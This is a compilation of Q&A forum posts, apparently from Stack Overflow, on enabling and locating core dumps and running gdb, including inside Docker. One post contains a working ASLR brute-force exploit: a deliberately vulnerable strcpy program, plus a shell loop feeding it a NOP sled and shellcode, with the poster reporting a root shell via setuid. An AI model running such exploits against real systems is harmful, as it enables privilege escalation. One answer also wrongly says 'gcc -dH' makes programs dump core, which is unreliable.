When I run programs with segfaults I get an error message Segmentation fault: 11. For some reason, I'm not getting the (core dumped) message. I tried running the shell command ulimit -c unlimited, but I still get the same error and it doesn't say core dumped. I'm new to GDB so I tried it with a simple program:
/* coredump.c */
#include <stdio.h>
int main (void) {
int *point = NULL;
*point = 0;
return 0;
}
But when I compile using:
gcc coredump.c -g -o coredump
And run it, it still says segfault: 11
Is it still creating a core dump somewhere I don't know about? I want to be able to use gdb coredump core.
Look at this link:
How to generate a core dump in Linux when a process gets a segmentation fault?
Options include:
ulimit -c unlimited (default = 0: no core files generated)
the directory for the dump must be writable. By default this is the current directory of the process, but that may be changed by setting /proc/sys/kernel/core_pattern.
in some conditions, the kernel value in /proc/sys/fs/suid_dumpable may prevent the core to be generated.
"man core" for other options
find / -name core -print 2> /dev/null to search your filesystem for core files
I presume you're running Linux, and I presume you're executing the .exe in a directory where you have write permissions.
So my top two guesses would be 1) "ulimit -c unlimited" isn't getting set, or is being overridden, or 2) the core files are being generated, but going "somewhere else".
The above suggestions should help. Please post back what you find!
If you're running the program that crashes from the shell, then you should follow the guidelines in Apple's Tech Note TN2124, which I found out about in in the answer to SO2207233.
There are a few key points:
You need to set ulimit -c unlimited in bash (same effect, different command in tcsh).
You need to set the permissions on the /cores directory so that you can create files in it. The default permissions are 1775; you need 1777. The 1 indicates the sticky bit is set.
The core dumps are then created in /cores suffixed with a PID (/cores/core.5312, for example).
If you want programs launched graphically to dump core when they crash, then you need to create /etc/launchd.conf if it does not already exist, and add a line limit core unlimited to the file. Again, see the information in the Tech Note for more details.
Watch it; core dumps are huge! Consider this not very complicated or big program:
#include <stdio.h>
int main(void)
{
int *i = 0;
int j = 0;
printf("i = %d, j = %d, i / j = %d\n", *i, j, *i / j);
return 0;
}
The core dump from this is nearly 360 MB.
Using gcc, if you add the flags:
gcc -g -dH
you should be able to generate a core dump
The -g flag produces some debugging information to use with gdb, and the -dH flag produces a core dump when there is an error
Sometimes core files are not store in current directory and may follow a different naming rule
sysctl -a | grep kern.core
may give hints to where your core files are stored
Related
what have i done wrong (or didn't do) that gdb is not working properly for me?
root#6be3d60ab7c6:/# cat minimal.c
int main()
{
int i = 1337;
return 0;
}
root#6be3d60ab7c6:/# gcc -g minimal.c -o minimal
root#6be3d60ab7c6:/# gdb minimal
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
.
.
.
Reading symbols from minimal...done.
(gdb) break main
Breakpoint 1 at 0x4004f1: file minimal.c, line 3.
(gdb) run
Starting program: /minimal
warning: Error disabling address space randomization: Operation not permitted
During startup program exited normally.
(gdb)
(gdb) print i
No symbol "i" in current context.
If you're using Docker, you probably need the --security-opt seccomp=unconfined option (as well as enabling ptrace):
docker run --cap-add=SYS_PTRACE --security-opt seccomp=unconfined
For whatever reason, your user account doesn't have permission to disable the kernel's address space layout randomisation for this process. By default, gdb turns this off because it makes some sorts of debugging easier (in particular, it means the address of stack objects will be the same each time you run your program). Read more here.
You can work around this problem by disabling this feature of gdb with set disable-randomization off.
As for getting your user the permission needed to disable ASLR, it probably boils down to having write permission to /proc/sys/kernel/randomize_va_space. Read more here.
Building on wisbucky's answer (thank you!), here are the same settings for Docker compose:
security_opt:
- seccomp:unconfined
cap_add:
- SYS_PTRACE
The security option seccomp:unconfined fixed the address space randomization warnings.
The capability SYS_PTRACE didn't seem to have a noticeable effect even though the Docker documentation states that SYS_PTRACE is a capability that is "not granted by default". Perhaps I don't know what to look for.
I've made a program with a segmentation fault and i want to get the core dump file but it seems that the file is not on the current directory. I've read and follow these instructions:
core dumped - but core file is not in current directory?
but I'm still unable to get the core file.
I've tried this:
ulimit -c unlimited
ulimit -S -c unlimited
I've also edited /etc/security/limits.conf the line:
* soft core 10000
(it was 0 the default value)
And as my system runs apport so I've searched /var/crash and the file I wanted (that should've generated) wasn't in there.
More useful information:
$ cat /proc/sys/kernel/core_pattern
|/usr/share/apport/apport %p %s %c
So what did I miss? I still don't get the core file after the segmentation fault or if I do I don't know where he is going to.
I am invoking make from my C program, which intern executes another program. I am redirecting both the standard out and standard error to a file. However, when the program run by make terminates due to segmentation fault, a core dump is generated and printed to the console (standard out) of the main program that is invoking make.
How can I get around this and not have the core dump show on the console?
The following is my code to invoke make :
int pid = fork();
if(pid==0){
dup2(make_logs, 1);
dup2(make_logs, 2);
close(make_logs);
execvp (args[0],args);
}
Where make_logs is the file opened using 'open'
Thanks
I would try to fix the core dump rather than suppressing the message, but the message about the segmentation fault is being generated by the shell (which detects the exit value of the child and recognize a core dump situation), so you can suppress it by installing your own program that handles the fork() and wait() rather than having the shell do the work.
To suppress the core dump, just use limit coredumpsize 0.
Sample of suppression (sloppy code; you should really be checking for errors):
#include <sys/types.h>
#include <sys/wait.h>
main( int argc, char **argv )
{
int pid;
if( (pid = fork() ) > 0 ) wait( 0 );
else if( pid == 0 ) {
execl( "program-that-cdumps", "program-that-cdumps", 0 );
perror("failed in execl");
} else perror("failed in fork");
}
Read core(5) and signal(7) man pages.
Compile all your programs with gcc -Wall -g. Then use
file core
to understand which binary dumped the core. It probably says something like core dump from foo to tell you that program foo dumped the core. Then, start a post mortem debugger on it:
gdb foo core
and use the common gdb commands (notably bt to backtrace, p to print, etc...).
The message dumped core is given by some shell (or perhaps by make when it is acting like a shell). I don't think that the core file is output to stdout (it is a big binary file).
If you wish to avoid the core (which IMHO is a bad idea, a core dump is a good symptom of something wrong), you could call the setrlimit(2) syscall with RLIMIT_CORE and a 0 limit after your fork and before the execvp. I believe you should not do that (or at least have some way of configuring that setrlimit is not called: sometimes you really need the core dump to debug the problem).
You should fix the problem which gives the core dump, not try to avoid the dumped core message!
If you run make on a user provided Makefile so that the core dump is from a user program, you really want to keep the user informed that a core did happen, so you should keep the core dumped message.
I just read about Address Space Layout Randomization and I tried a very simple script to try to brute force it. Here is the program I used to test a few things.
#include <stdio.h>
#include <string.h>
int main (int argc, char **argv)
{
char buf[8];
printf("&buf = %p\n", buf);
if (argc > 1 && strcpy(buf, argv[1]));
return 0;
}
I compiled it with this command:
gcc -g -fno-stack-protector -o vul vul.c
I made sure ASLR was enabled:
$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2
Then, I came up with this simple script:
str=`perl -e 'print "\x40\xfa\xbb\xbf"x10 \
. "\x90"x65536 \
. "\x31\xc0\x40\x89\xc3\xcd\x80"'`
while [ $? -ne 1 ]; do
./vul $str
done
The format is
return address many times | 64KB NOP slide | shellcode that runs exit(1)
After running this script for a few seconds it exits with error code 1 as I wanted it to. I also tried other shellcodes that call execv("/bin/sh", ...) and I was successful as well.
I find it strange that it's possible to create such a long NOP slide even after the return address. I thought ASLR was more effective, did I miss something? Is it because the address space is too small?
EDIT: I did some additional research and here is what I found:
I asked a friend to run this code using -m32 -z execstack on his 64b computer and after changing the return address a bit, he had the same results.
Even though I did not use -z execstack, I managed to execute the shellcode. I made sure of that by using different shellcodes which all did what they were supposed to do (even the well know scenario chown root ./vul, chmod +s ./vul, shellcode that runs setreuid(0, 0) then execv("/bin/sh", ...) and finally whoami that returns 'root' in the spawned shell).
That is quite strange since execstack -q ./vul tels me the executable stack flag bit is not set. Does anyone have an idea why?
First of all, I'm a bit surprised that you do not need to pass the option -z execstack to the compiler to get the shellcode to execute the exit(1).
Moreover, I guess you are on a 32bits machine as you did not pass the option -m32 to gcc in order to get 32bits code.
Finally, I did run your program without success (I waited way more than a few seconds).
So, I'm a bit doubtful about your conclusion (except if you are running a very peculiar Linux system or may have been lucky).
Anyway, there are two main things that you have not mentionned:
Having a bug that offer an unlimited exploitation windows is quite rare.
Most of the modern systems run on amd64 (64bits) processors, which lower drastically the probability to hit the nop-zone.
You may take a look at the section "ASLR Effectiveness" on the ASLR's Wikipedia page.
How can I dump the core when my program receives the SIGSEGV signal ? (The server that runs my program has very limited permissions and therefore core dump is disabled by default.)
I have written the following using gcore but I would like to use C functions instead. Can I somehow catch the core and write it to a folder somewhere ?
void segfaulthandler(int parameter)
{
char gcore[50];
sprintf(gcore, "gcore -s -c \"core\" %u", getpid());
system(gcore);
exit(1);
}
int main(void)
{
signal(SIGSEGV, segfaulthandler);
}
Unless there's a hard limit preventing you, you could use setrlimit(RLIMIT_CORE, ...) to increase the softlimit and enable coredumps - this corresponds to running ulimit -c in shell.
On linux, you typically can do:
$ ulimit -c unlimited
The resulting core file will be written in the current working directory of the process when the signal is received.